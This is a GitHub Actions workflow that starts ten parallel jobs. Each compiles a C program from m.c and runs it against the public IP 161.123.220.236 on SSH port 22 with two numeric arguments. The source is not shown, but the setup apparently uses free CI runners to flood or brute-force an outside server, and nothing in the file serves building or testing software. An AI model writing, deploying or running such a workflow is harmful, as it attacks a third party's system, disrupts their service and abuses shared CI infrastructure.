name: Parallel GCC Jobs

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  build-and-run:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job-number: [1,2,3,4,5,6,7,8,9,10]
    name: Job ${{ matrix.job-number }}
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Install GCC
        run: sudo apt-get update && sudo apt-get install -y build-essential

      - name: Compile C program
        run: gcc -o k m.c -lpthread

      - name: Run executable
        run: ./k 161.123.220.236 22 400 300
